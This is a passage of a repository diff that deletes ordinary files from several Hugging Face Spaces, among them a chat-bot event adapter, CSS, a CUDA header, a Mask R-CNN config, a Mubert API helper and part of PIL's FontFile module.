logger.info(`${logger.blue(`[${data.self_id}]`)} 子频道更新:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${JSON.stringify(data.old_info)}=>${JSON.stringify(data.new_info)}`) - break - case "channel_created": - data.notice_type = "guild_channel_created" - logger.info(`${logger.blue(`[${data.self_id}]`)} 子频道创建:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${JSON.stringify(data.channel_info)}`) - data.bot.getGroupMap() - break - case "channel_destroyed": - data.notice_type = "guild_channel_destroyed" - logger.info(`${logger.blue(`[${data.self_id}]`)} 子频道删除:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${JSON.stringify(data.channel_info)}`) - data.bot.getGroupMap() - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知通知:${logger.magenta(JSON.stringify(data))}`) - } - - let notice = data.notice_type.split("_") - data.notice_type = notice.shift() - notice = notice.join("_") - if (notice) - data.sub_type = notice - - if (data.guild_id && data.channel_id) { - data.group_id = `${data.guild_id}-${data.channel_id}` - Object.defineProperty(data, "friend", { get() { return this.member || {}}}) - } - - Bot.em(`${data.post_type}.${data.notice_type}.${data.sub_type}`, data) - } - - makeRequest(data) { - switch (data.request_type) { - case "friend": - logger.info(`${logger.blue(`[${data.self_id}]`)} 加好友请求:[${data.user_id}] ${data.comment}(${data.flag})`) - data.sub_type = "add" - data.approve = approve => data.bot.setFriendAddRequest(data.flag, approve) - break - case "group": - logger.info(`${logger.blue(`[${data.self_id}]`)} 加群请求:[${data.group_id}, ${data.user_id}] ${data.sub_type} ${data.comment}(${data.flag})`) - data.approve = approve => data.bot.setGroupAddRequest(data.flag, data.sub_type, approve) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知请求:${logger.magenta(JSON.stringify(data))}`) - } - - data.bot.request_list.push(data) - Bot.em(`${data.post_type}.${data.request_type}.${data.sub_type}`, data) - } - - heartbeat(data) { - if (data.status?.stat) - data.bot.stat = { - ...data.status, - lost_pkt_cnt: data.status.stat.packet_lost, - lost_times: data.status.stat.lost_times, - recv_msg_cnt: data.status.stat.message_received, - recv_pkt_cnt: data.status.stat.packet_received, - sent_msg_cnt: data.status.stat.message_sent, - sent_pkt_cnt: data.status.stat.packet_sent, - start_time: data.bot.stat.start_time, - } - } - - makeMeta(data, ws) { - switch (data.meta_event_type) { - case "heartbeat": - this.heartbeat(data) - break - case "lifecycle": - this.connect(data, ws) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - } - - message(data, ws) { - try { - data = JSON.parse(data) - } catch (err) { - return logger.error(`解码数据失败:${logger.red(err)}`) - } - - if (data.post_type) { - if (data.meta_event_type != "lifecycle" && !Bot.uin.includes(data.self_id)) { - logger.warn(`${logger.blue(`[${data.self_id}]`)} 找不到对应Bot,忽略消息:${logger.magenta(JSON.stringify(data))}`) - return false - } - data.bot = Bot[data.self_id] - - switch (data.post_type) { - case "meta_event": - this.makeMeta(data, ws) - break - case "message": - this.makeMessage(data) - break - case "notice": - this.makeNotice(data) - break - case "request": - this.makeRequest(data) - break - case "message_sent": - data.post_type = "message" - this.makeMessage(data) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - } else if (data.echo) { - Bot.emit(data.echo, data) - } else { - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - } - - load() { - if (!Array.isArray(Bot.wsf[this.path])) - Bot.wsf[this.path] = [] - Bot.wsf[this.path].push((ws, ...args) => - ws.on("message", data => this.message(data, ws, ...args)) - ) - } -}) \ No newline at end of file diff --git a/spaces/CobaltZvc/Hyper_Bot/style.css b/spaces/CobaltZvc/Hyper_Bot/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/CobaltZvc/Hyper_Bot/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/CofAI/netlist/index.html b/spaces/CofAI/netlist/index.html deleted file mode 100644 index 15388ffe25e26693f2232ba80adc6f0d2caa5700..0000000000000000000000000000000000000000 --- a/spaces/CofAI/netlist/index.html +++ /dev/null @@ -1,12 +0,0 @@ - - NetList - - - - - - - - - \ No newline at end of file diff --git a/spaces/CorvaeOboro/gen_ability_icon/torch_utils/ops/bias_act.h b/spaces/CorvaeOboro/gen_ability_icon/torch_utils/ops/bias_act.h deleted file mode 100644 index a32187e1fb7e3bae509d4eceaf900866866875a4..0000000000000000000000000000000000000000 --- a/spaces/CorvaeOboro/gen_ability_icon/torch_utils/ops/bias_act.h +++ /dev/null @@ -1,38 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -//------------------------------------------------------------------------ -// CUDA kernel parameters. - -struct bias_act_kernel_params -{ - const void* x; // [sizeX] - const void* b; // [sizeB] or NULL - const void* xref; // [sizeX] or NULL - const void* yref; // [sizeX] or NULL - const void* dy; // [sizeX] or NULL - void* y; // [sizeX] - - int grad; - int act; - float alpha; - float gain; - float clamp; - - int sizeX; - int sizeB; - int stepB; - int loopX; -}; - -//------------------------------------------------------------------------ -// CUDA kernel selection. - -template void* choose_bias_act_kernel(const bias_act_kernel_params& p); - -//------------------------------------------------------------------------ diff --git a/spaces/Curranj/GPT-SQL/README.md b/spaces/Curranj/GPT-SQL/README.md deleted file mode 100644 index ae8932ce98d6665219909798f8bc8e59707cda81..0000000000000000000000000000000000000000 --- a/spaces/Curranj/GPT-SQL/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: GPT SQL -emoji: 💻 -colorFrom: purple -colorTo: blue -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Cyril666/ContourNet-ABI/maskrcnn_benchmark/config/defaults.py b/spaces/Cyril666/ContourNet-ABI/maskrcnn_benchmark/config/defaults.py deleted file mode 100644 index aa35ac474b5d42a99361d1ac5ba2d8e164ae0a2c..0000000000000000000000000000000000000000 --- a/spaces/Cyril666/ContourNet-ABI/maskrcnn_benchmark/config/defaults.py +++ /dev/null @@ -1,471 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. -import os - -from yacs.config import CfgNode as CN - - -# ----------------------------------------------------------------------------- -# Convention about Training / Test specific parameters -# ----------------------------------------------------------------------------- -# Whenever an argument can be either used for training or for testing, the -# corresponding name will be post-fixed by a _TRAIN for a training parameter, -# or _TEST for a test-specific parameter. -# For example, the number of images during training will be -# IMAGES_PER_BATCH_TRAIN, while the number of images for testing will be -# IMAGES_PER_BATCH_TEST - -# ----------------------------------------------------------------------------- -# Config definition -# ----------------------------------------------------------------------------- - -_C = CN() - -_C.MODEL = CN() -_C.MODEL.RPN_ONLY = False -_C.MODEL.MASK_ON = False -_C.MODEL.FCOS_ON = False -_C.MODEL.KE_ON = False -_C.MODEL.BOUNDARY_ON = False -_C.MODEL.MSR_ON = False -_C.MODEL.RETINANET_ON = False -_C.MODEL.KEYPOINT_ON = False -_C.MODEL.DEVICE = "cuda" -_C.MODEL.META_ARCHITECTURE = "GeneralizedRCNN" -_C.MODEL.CLS_AGNOSTIC_BBOX_REG = False - -# If the WEIGHT starts with a catalog://, like :R-50, the code will look for -# the path in paths_catalog. Else, it will use it as the specified absolute -# path -_C.MODEL.WEIGHT = "" - - -# ----------------------------------------------------------------------------- -# INPUT -# ----------------------------------------------------------------------------- -_C.INPUT = CN() -# Size of the smallest side of the image during training -_C.INPUT.MIN_SIZE_TRAIN = (800,) # (800,) -# The range of the smallest side for multi-scale training -_C.INPUT.MIN_SIZE_RANGE_TRAIN = (-1, -1) # -1 means disabled and it will use MIN_SIZE_TRAIN -# Maximum size of the side of the image during training -_C.INPUT.MAX_SIZE_TRAIN = 1333 -# Size of the smallest side of the image during testing -_C.INPUT.MIN_SIZE_TEST = 1000 -# Maximum size of the side of the image during testing -_C.INPUT.MAX_SIZE_TEST = 1333 -# Values to be used for image normalization -_C.INPUT.PIXEL_MEAN = [102.9801, 115.9465, 122.7717] -# Values to be used for image normalization -_C.INPUT.PIXEL_STD = [1., 1., 1.] -# Convert image to BGR format (for Caffe2 models), in range 0-255 -_C.INPUT.TO_BGR255 = True -_C.INPUT.CROP_PROB_TRAIN = 1.0 -_C.INPUT.ROTATE_PROB_TRAIN = 0.3 -_C.INPUT.ROTATE_DEGREE = (0,15,-15,45,-45,90,-90) -# _C.INPUT.ROTATE_DEGREE = 15 - - - - -# ----------------------------------------------------------------------------- -# Dataset -# ----------------------------------------------------------------------------- -_C.DATASETS = CN() -# List of the dataset names for training, as present in paths_catalog.py -_C.DATASETS.TRAIN = () -# List of the dataset names for testing, as present in paths_catalog.py -_C.DATASETS.TEST = () -_C.DATASETS.Test_Visual = False -# ----------------------------------------------------------------------------- -# DataLoader -# ----------------------------------------------------------------------------- -_C.DATALOADER = CN() -# Number of data loading threads -_C.DATALOADER.NUM_WORKERS = 4 -# If > 0, this enforces that each collated batch should have a size divisible -# by SIZE_DIVISIBILITY -_C.DATALOADER.SIZE_DIVISIBILITY = 0 -# If True, each batch should contain only images for which the aspect ratio -# is compatible. This groups portrait images together, and landscape images -# are not batched with portrait images. -_C.DATALOADER.ASPECT_RATIO_GROUPING = True - - -# ---------------------------------------------------------------------------- # -# Backbone options -# ---------------------------------------------------------------------------- # -_C.MODEL.BACKBONE = CN() - -# The backbone conv body to use -# The string must match a function that is imported in modeling.model_builder -# (e.g., 'FPN.add_fpn_ResNet101_conv5_body' to specify a ResNet-101-FPN -# backbone) -_C.MODEL.BACKBONE.CONV_BODY = "R-50-C4" - -# Add StopGrad at a specified stage so the bottom layers are frozen -_C.MODEL.BACKBONE.FREEZE_CONV_BODY_AT = 2 -# GN for backbone - -##123123123 -_C.MODEL.BACKBONE.USE_GN = False - - -# ---------------------------------------------------------------------------- # -# FPN options -# ---------------------------------------------------------------------------- # -_C.MODEL.FPN = CN() - -# 123123123 -_C.MODEL.FPN.USE_GN = False -_C.MODEL.FPN.USE_RELU = False - -#############123123123 -_C.MODEL.FPN.USE_DEFORMABLE = False - - -# ---------------------------------------------------------------------------- # -# Group Norm options -# ---------------------------------------------------------------------------- # -_C.MODEL.GROUP_NORM = CN() -# Number of dimensions per group in GroupNorm (-1 if using NUM_GROUPS) -_C.MODEL.GROUP_NORM.DIM_PER_GP = -1 -# Number of groups in GroupNorm (-1 if using DIM_PER_GP) -_C.MODEL.GROUP_NORM.NUM_GROUPS = 32 -# GroupNorm's small constant in the denominator -_C.MODEL.GROUP_NORM.EPSILON = 1e-5 - - -# ---------------------------------------------------------------------------- # -# RPN options -# ---------------------------------------------------------------------------- # -_C.MODEL.RPN = CN() -_C.MODEL.RPN.USE_FPN = False -# Base RPN anchor sizes given in absolute pixels w.r.t. the scaled network input -_C.MODEL.RPN.ANCHOR_SIZES = (32, 64, 128, 256, 512) -# Stride of the feature map that RPN is attached. -# For FPN, number of strides should match number of scales -_C.MODEL.RPN.ANCHOR_STRIDE = (16,) -# RPN anchor aspect ratios -_C.MODEL.RPN.ASPECT_RATIOS = (0.5, 1.0, 2.0) -# Remove RPN anchors that go outside the image by RPN_STRADDLE_THRESH pixels -# Set to -1 or a large value, e.g. 100000, to disable pruning anchors -_C.MODEL.RPN.STRADDLE_THRESH = 0 -# Minimum overlap required between an anchor and ground-truth box for the -# (anchor, gt box) pair to be a positive example (IoU >= FG_IOU_THRESHOLD -# ==> positive RPN example) -_C.MODEL.RPN.FG_IOU_THRESHOLD = 0.7 -# Maximum overlap allowed between an anchor and ground-truth box for the -# (anchor, gt box) pair to be a negative examples (IoU < BG_IOU_THRESHOLD -# ==> negative RPN example) -_C.MODEL.RPN.BG_IOU_THRESHOLD = 0.3 -# Total number of RPN examples per image -_C.MODEL.RPN.BATCH_SIZE_PER_IMAGE = 256 -# Target fraction of foreground (positive) examples per RPN minibatch -_C.MODEL.RPN.POSITIVE_FRACTION = 0.5 -# Number of top scoring RPN proposals to keep before applying NMS -# When FPN is used, this is *per FPN level* (not total) -_C.MODEL.RPN.PRE_NMS_TOP_N_TRAIN = 12000 - -_C.MODEL.RPN.PRE_NMS_TOP_N_TEST = 6000 -# Number of top scoring RPN proposals to keep after applying NMS -_C.MODEL.RPN.POST_NMS_TOP_N_TRAIN = 2000 -_C.MODEL.RPN.POST_NMS_TOP_N_TEST = 1000 -# NMS threshold used on RPN proposals -_C.MODEL.RPN.NMS_THRESH = 0.7 -# Proposal height and width both need to be greater than RPN_MIN_SIZE -# (a the scale used during training or inference) -_C.MODEL.RPN.MIN_SIZE = 0 -# Number of top scoring RPN proposals to keep after combining proposals from -# all FPN levels -_C.MODEL.RPN.FPN_POST_NMS_TOP_N_TRAIN = 2000 -_C.MODEL.RPN.FPN_POST_NMS_TOP_N_TEST = 2000 -# Custom rpn head, empty to use default conv or separable conv -_C.MODEL.RPN.RPN_HEAD = "SingleConvRPNHead_1" - - -# ---------------------------------------------------------------------------- # -# ROI HEADS options -# ---------------------------------------------------------------------------- # -_C.MODEL.ROI_HEADS = CN() -_C.MODEL.ROI_HEADS.USE_FPN = False -_C.MODEL.ROI_HEADS.USE_FPN = False -# Overlap threshold for an RoI to be considered foreground (if >= FG_IOU_THRESHOLD) -_C.MODEL.ROI_HEADS.FG_IOU_THRESHOLD = 0.5 -# Overlap threshold for an RoI to be considered background -# (class = 0 if overlap in [0, BG_IOU_THRESHOLD)) -_C.MODEL.ROI_HEADS.BG_IOU_THRESHOLD = 0.5 -# Default weights on (dx, dy, dw, dh) for normalizing bbox regression targets -# These are empirically chosen to approximately lead to unit variance targets -_C.MODEL.ROI_HEADS.BBOX_REG_WEIGHTS = (10., 10., 5., 5.) -# RoI minibatch size *per image* (number of regions of interest [ROIs]) -# Total number of RoIs per training minibatch = -# TRAIN.BATCH_SIZE_PER_IM * TRAIN.IMS_PER_BATCH -# E.g., a common configuration is: 512 * 2 * 8 = 8192 -_C.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 512 -# Target fraction of RoI minibatch that is labeled foreground (i.e. class > 0) -_C.MODEL.ROI_HEADS.POSITIVE_FRACTION = 0.25 - -# Only used on test mode - -# Minimum score threshold (assuming scores in a [0, 1] range); a value chosen to -# balance obtaining high recall with not having too many low precision -# detections that will slow down inference post processing steps (like NMS) -_C.MODEL.ROI_HEADS.SCORE_THRESH = 0.05 -# Overlap threshold used for non-maximum suppression (suppress boxes with -# IoU >= this threshold) -_C.MODEL.ROI_HEADS.NMS = 0.5 -# Maximum number of detections to return per image (100 is based on the limit established for the COCO dataset) -_C.MODEL.ROI_HEADS.DETECTIONS_PER_IMG = 100 - - -_C.MODEL.ROI_BOX_HEAD = CN() -_C.MODEL.ROI_BOX_HEAD.FEATURE_EXTRACTOR = "ResNet50Conv5ROIFeatureExtractor" -_C.MODEL.ROI_BOX_HEAD.PREDICTOR = "FastRCNNPredictor" -_C.MODEL.ROI_BOX_HEAD.POOLER_RESOLUTION = 14 -_C.MODEL.ROI_BOX_HEAD.POOLER_SAMPLING_RATIO = 0 -_C.MODEL.ROI_BOX_HEAD.POOLER_SCALES = (1.0 / 16,) -_C.MODEL.ROI_BOX_HEAD.NUM_CLASSES = 81 -# Hidden layer dimension when using an MLP for the RoI box head -_C.MODEL.ROI_BOX_HEAD.MLP_HEAD_DIM = 1024 -# GN -#####123123123 -_C.MODEL.ROI_BOX_HEAD.USE_GN = False -# Dilation -_C.MODEL.ROI_BOX_HEAD.DILATION = 1 -_C.MODEL.ROI_BOX_HEAD.CONV_HEAD_DIM = 256 - -#### 123123 -_C.MODEL.ROI_BOX_HEAD.NUM_STACKED_CONVS = 4 -_C.MODEL.ROI_BOX_HEAD.CLASS_WEIGHT = 0.1 -_C.MODEL.ROI_BOX_HEAD.DEFORMABLE_POOLING = False - -_C.MODEL.ROI_MASK_HEAD = CN() -# Whether or not resize and translate masks to the input image. -_C.MODEL.ROI_MASK_HEAD.POSTPROCESS_MASKS = False -_C.MODEL.ROI_MASK_HEAD.POSTPROCESS_MASKS_THRESHOLD = 0.5 -_C.MODEL.ROI_MASK_HEAD.DILATION = 1 -_C.MODEL.ROI_MASK_HEAD.USE_GN = False - -# Boundary edge -_C.MODEL.ROI_BOUNDARY_HEAD = CN() -_C.MODEL.ROI_BOUNDARY_HEAD.DEFORMABLE_POOLING = False - -_C.MODEL.ROI_BOUNDARY_HEAD.FEATURE_EXTRACTOR = "ResNet50Conv5ROIFeatureExtractor" -_C.MODEL.ROI_BOUNDARY_HEAD.POOLER_RESOLUTION = 14 -_C.MODEL.ROI_BOUNDARY_HEAD.POOLER_SCALES = (1.0 / 16,) -_C.MODEL.ROI_BOUNDARY_HEAD.POOLER_SAMPLING_RATIO = 0 -_C.MODEL.ROI_BOUNDARY_HEAD.CONV_LAYERS = (256, 256, 256, 256) - -_C.MODEL.ROI_BOUNDARY_HEAD.PREDICTOR = "KERCNNC4Predictor" -_C.MODEL.ROI_BOUNDARY_HEAD.RESOLUTION = 14 -_C.MODEL.ROI_BOUNDARY_HEAD.SHARE_BOX_FEATURE_EXTRACTOR = True -_C.MODEL.ROI_BOUNDARY_HEAD.BO_WEIGHT = 1.0 -_C.MODEL.ROI_BOUNDARY_HEAD.Loss_balance = 1.2 - -# ---------------------------------------------------------------------------- # -# ResNe[X]t options (ResNets = {ResNet, ResNeXt} -# Note that parts of a resnet may be used for both the backbone and the head -# These options apply to both -# ---------------------------------------------------------------------------- # -_C.MODEL.RESNETS = CN() - -# Number of groups to use; 1 ==> ResNet; > 1 ==> ResNeXt -_C.MODEL.RESNETS.NUM_GROUPS = 1 - -# Baseline width of each group -_C.MODEL.RESNETS.WIDTH_PER_GROUP = 64 - -# Place the stride 2 conv on the 1x1 filter -# Use True only for the original MSRA ResNet; use False for C2 and Torch models -_C.MODEL.RESNETS.STRIDE_IN_1X1 = True - -# Residual transformation function -_C.MODEL.RESNETS.TRANS_FUNC = "BottleneckWithFixedBatchNorm" -_C.MODEL.RESNETS.DEF_FUNC = "DeformableConvWithFixedBatchNorm" -# ResNet's stem function (conv1 and pool1) -_C.MODEL.RESNETS.STEM_FUNC = "StemWithFixedBatchNorm" -_C.MODEL.RESNETS.DEF_START_MODULE = "NA" - -#########123123123 -_C.MODEL.RESNETS.DEFORM_POOLING = False - -# Apply dilation in stage "res5" -_C.MODEL.RESNETS.RES5_DILATION = 1 - -_C.MODEL.RESNETS.BACKBONE_OUT_CHANNELS = 256 * 4 -_C.MODEL.RESNETS.RES2_OUT_CHANNELS = 256 -_C.MODEL.RESNETS.STEM_OUT_CHANNELS = 64 - -# ---------------------------------------------------------------------------- # -# FCOS Options -# ---------------------------------------------------------------------------- # -_C.MODEL.FCOS = CN() -_C.MODEL.FCOS.NUM_CLASSES = 81 # the number of classes including background -_C.MODEL.FCOS.FPN_STRIDES = [8, 16, 32, 64, 128] -_C.MODEL.FCOS.PRIOR_PROB = 0.01 -_C.MODEL.FCOS.INFERENCE_TH = 0.05 -_C.MODEL.FCOS.NMS_TH = 0.4 -_C.MODEL.FCOS.PRE_NMS_TOP_N = 1000 - -# Focal loss parameter: alpha -_C.MODEL.FCOS.LOSS_ALPHA = 0.25 -# Focal loss parameter: gamma -_C.MODEL.FCOS.LOSS_GAMMA = 2.0 -_C.MODEL.FCOS.SIZES_OF_INTEREST = [64, 128, 256, 512] - -# the number of convolutions used in the cls and bbox tower -_C.MODEL.FCOS.NUM_CONVS = 4 - -# ---------------------------------------------------------------------------- # -# RetinaNet Options (Follow the Detectron version) -# ---------------------------------------------------------------------------- # -_C.MODEL.RETINANET = CN() - -# This is the number of foreground classes and background. -_C.MODEL.RETINANET.NUM_CLASSES = 81 - -# Anchor aspect ratios to use -_C.MODEL.RETINANET.ANCHOR_SIZES = (32, 64, 128, 256, 512) -_C.MODEL.RETINANET.ASPECT_RATIOS = (0.5, 1.0, 2.0) -_C.MODEL.RETINANET.ANCHOR_STRIDES = (8, 16, 32, 64, 128) -_C.MODEL.RETINANET.STRADDLE_THRESH = 0 - -# Anchor scales per octave -_C.MODEL.RETINANET.OCTAVE = 2.0 -_C.MODEL.RETINANET.SCALES_PER_OCTAVE = 3 - -# Use C5 or P5 to generate P6 -_C.MODEL.RETINANET.USE_C5 = True - -# Convolutions to use in the cls and bbox tower -# NOTE: this doesn't include the last conv for logits -_C.MODEL.RETINANET.NUM_CONVS = 4 - -# Weight for bbox_regression loss -_C.MODEL.RETINANET.BBOX_REG_WEIGHT = 4.0 - -# Smooth L1 loss beta for bbox regression -_C.MODEL.RETINANET.BBOX_REG_BETA = 0.11 - -# During inference, #locs to select based on cls score before NMS is performed -# per FPN level -_C.MODEL.RETINANET.PRE_NMS_TOP_N = 1000 - -# IoU overlap ratio for labeling an anchor as positive -# Anchors with >= iou overlap are labeled positive -_C.MODEL.RETINANET.FG_IOU_THRESHOLD = 0.5 - -# IoU overlap ratio for labeling an anchor as negative -# Anchors with < iou overlap are labeled negative -_C.MODEL.RETINANET.BG_IOU_THRESHOLD = 0.4 - -# Focal loss parameter: alpha -_C.MODEL.RETINANET.LOSS_ALPHA = 0.25 - -# Focal loss parameter: gamma -_C.MODEL.RETINANET.LOSS_GAMMA = 2.0 - -# Prior prob for the positives at the beginning of training. This is used to set -# the bias init for the logits layer -_C.MODEL.RETINANET.PRIOR_PROB = 0.01 - -# Inference cls score threshold, anchors with score > INFERENCE_TH are -# considered for inference -_C.MODEL.RETINANET.INFERENCE_TH = 0.05 - -# NMS threshold used in RetinaNet -_C.MODEL.RETINANET.NMS_TH = 0.4 - - -# ---------------------------------------------------------------------------- # -# FBNet options -# ---------------------------------------------------------------------------- # -_C.MODEL.FBNET = CN() -_C.MODEL.FBNET.ARCH = "default" -# custom arch -_C.MODEL.FBNET.ARCH_DEF = "" -_C.MODEL.FBNET.BN_TYPE = "bn" -_C.MODEL.FBNET.SCALE_FACTOR = 1.0 -# the output channels will be divisible by WIDTH_DIVISOR -_C.MODEL.FBNET.WIDTH_DIVISOR = 1 -_C.MODEL.FBNET.DW_CONV_SKIP_BN = True -_C.MODEL.FBNET.DW_CONV_SKIP_RELU = True - -# > 0 scale, == 0 skip, < 0 same dimension -_C.MODEL.FBNET.DET_HEAD_LAST_SCALE = 1.0 -_C.MODEL.FBNET.DET_HEAD_BLOCKS = [] -# overwrite the stride for the head, 0 to use original value -_C.MODEL.FBNET.DET_HEAD_STRIDE = 0 - -# > 0 scale, == 0 skip, < 0 same dimension -_C.MODEL.FBNET.KPTS_HEAD_LAST_SCALE = 0.0 -_C.MODEL.FBNET.KPTS_HEAD_BLOCKS = [] -# overwrite the stride for the head, 0 to use original value -_C.MODEL.FBNET.KPTS_HEAD_STRIDE = 0 - -# > 0 scale, == 0 skip, < 0 same dimension -_C.MODEL.FBNET.MASK_HEAD_LAST_SCALE = 0.0 -_C.MODEL.FBNET.MASK_HEAD_BLOCKS = [] -# overwrite the stride for the head, 0 to use original value -_C.MODEL.FBNET.MASK_HEAD_STRIDE = 0 - -# 0 to use all blocks defined in arch_def -_C.MODEL.FBNET.RPN_HEAD_BLOCKS = 0 -_C.MODEL.FBNET.RPN_BN_TYPE = "" - - -# ---------------------------------------------------------------------------- # -# Solver -# ---------------------------------------------------------------------------- # -_C.SOLVER = CN() -_C.SOLVER.MAX_ITER = 40000 - -_C.SOLVER.BASE_LR = 0.001 -_C.SOLVER.BIAS_LR_FACTOR = 2 - -_C.SOLVER.MOMENTUM = 0.9 - -_C.SOLVER.WEIGHT_DECAY = 0.0005 -_C.SOLVER.WEIGHT_DECAY_BIAS = 0 - -_C.SOLVER.GAMMA = 0.1 -_C.SOLVER.STEPS = (30000,) - -_C.SOLVER.WARMUP_FACTOR = 1.0 / 3 -_C.SOLVER.WARMUP_ITERS = 500 -_C.SOLVER.WARMUP_METHOD = "linear" - -_C.SOLVER.CHECKPOINT_PERIOD = 2500 - -# Number of images per batch -# This is global, so if we have 8 GPUs and IMS_PER_BATCH = 16, each GPU will -# see 2 images per batch -_C.SOLVER.IMS_PER_BATCH = 4 - -# ---------------------------------------------------------------------------- # -# Specific test options -# ---------------------------------------------------------------------------- # -_C.TEST = CN() -_C.TEST.EXPECTED_RESULTS = [] -_C.TEST.EXPECTED_RESULTS_SIGMA_TOL = 4 -# Number of images per batch -# This is global, so if we have 8 GPUs and IMS_PER_BATCH = 16, each GPU will -# see 2 images per batch -_C.TEST.IMS_PER_BATCH = 16 -# Number of detections per image -_C.TEST.DETECTIONS_PER_IMG = 100 - - -# ---------------------------------------------------------------------------- # -# Misc options -# ---------------------------------------------------------------------------- # -_C.OUTPUT_DIR = "./1" -_C.IS_LOAD_OPTIMIZER = True -_C.IS_LOAD_SCHEDULER = True -_C.PROCESS = CN() - -#####123123123 -_C.PROCESS.PNMS = False -_C.PROCESS.NMS_THRESH = 0.4 - -_C.PATHS_CATALOG = os.path.join(os.path.dirname(__file__), "paths_catalog.py") diff --git a/spaces/DGSpitzer/TXT-2-IMG-2-MUSIC-2-VIDEO-w-RIFFUSION/utils.py b/spaces/DGSpitzer/TXT-2-IMG-2-MUSIC-2-VIDEO-w-RIFFUSION/utils.py deleted file mode 100644 index 6fab4572bdf1e1bfb56c47f17093e9f3a2d087e9..0000000000000000000000000000000000000000 --- a/spaces/DGSpitzer/TXT-2-IMG-2-MUSIC-2-VIDEO-w-RIFFUSION/utils.py +++ /dev/null @@ -1,50 +0,0 @@ -import json -import numpy as np -import httpx - -from constants import MUBERT_TAGS, MUBERT_LICENSE, MUBERT_MODE, MUBERT_TOKEN - - -def get_mubert_tags_embeddings(w2v_model): - return w2v_model.encode(MUBERT_TAGS) - - -def get_pat(email: str): - r = httpx.post('https://api-b2b.mubert.com/v2/GetServiceAccess', - json={ - "method": "GetServiceAccess", - "params": { - "email": email, - "license": MUBERT_LICENSE, - "token": MUBERT_TOKEN, - "mode": MUBERT_MODE, - } - }) - - rdata = json.loads(r.text) - assert rdata['status'] == 1, "probably incorrect e-mail" - pat = rdata['data']['pat'] - return pat - - -def find_similar(em, embeddings, method='cosine'): - scores = [] - for ref in embeddings: - if method == 'cosine': - scores.append(1 - np.dot(ref, em) / (np.linalg.norm(ref) * np.linalg.norm(em))) - if method == 'norm': - scores.append(np.linalg.norm(ref - em)) - return np.array(scores), np.argsort(scores) - - -def get_tags_for_prompts(w2v_model, mubert_tags_embeddings, prompts, top_n=3, debug=False): - prompts_embeddings = w2v_model.encode(prompts) - ret = [] - for i, pe in enumerate(prompts_embeddings): - scores, idxs = find_similar(pe, mubert_tags_embeddings) - top_tags = MUBERT_TAGS[idxs[:top_n]] - top_prob = 1 - scores[idxs[:top_n]] - if debug: - print(f"Prompt: {prompts[i]}\nTags: {', '.join(top_tags)}\nScores: {top_prob}\n\n\n") - ret.append((prompts[i], list(top_tags))) - return ret \ No newline at end of file diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/PIL/FontFile.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/PIL/FontFile.py deleted file mode 100644 index 5ec0a6632e3182382467688662ebc5e6c324da91..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/PIL/FontFile.py +++ /dev/null @@ -1,110 +0,0 @@ -# -# The Python Imaging Library -# $Id$ -# -# base class for raster font file parsers -# -# history: -# 1997-06-05 fl created -# 1997-08-19 fl restrict image width -# -# Copyright (c) 1997-1998 by Secret Labs AB -# Copyright (c) 1997-1998 by Fredrik Lundh -# -# See the README file for information on usage and redistribution. -# - - -import os - -from . import Image, _binary - -WIDTH = 800 - - -def puti16(fp, values): - """Write network order (big-endian) 16-bit sequence""" - for v in values: - if v < 0: - v += 65536 - fp.write(_binary.o16be(v)) - - -class FontFile: - """Base class for raster font file handlers.""" - - bitmap = None - - def __init__(self): - self.info = {} - self.glyph = [None] * 256 - - def __getitem__(self, ix): - return self.glyph[ix] - - def compile(self): - """Create metrics and bitmap""" - - if self.bitmap: - return - - # create bitmap large enough to hold all data - h = w = maxwidth = 0 - lines = 1 - for glyph in self: - if glyph: - d, dst, src, im = glyph - h = max(h, src[3] - src[1]) - w = w + (src[2] - src[0]) - if w > WIDTH: - lines += 1 - w = src[2] - src[0] - maxwidth = max(maxwidth, w) - - xsize = maxwidth - ysize = lines * h - - if xsize == 0 and ysize == 0: - return "" - - self.ysize = h - - # paste glyphs into bitmap - self.bitmap = Image.new("1", (xsize, ysize)) - self.metrics = [None] * 256 - x = y = 0 - for i in range(256): - glyph = self[i] - if glyph: - d, dst, src, im = glyph - xx = src[2] - src[0] - # yy = src[3] - src[1] - x0, y0 = x, y - x = x + xx - if x > WIDTH: - x, y = 0, y + h - x0, y0 = x, y - x = xx - s = src[0] + x0, src[1] + y0, src[2] + x0, src[3] + y0 - self.bitmap.paste(im.crop(src), s) - self.metrics[i] = d, dst, s - - def save(self, filename): - """Save font""" - - self.compile() - - # font data - self.bitmap.save(os.path.splitext(filename)[0] + ".pbm", "PNG") - - # font metrics - with 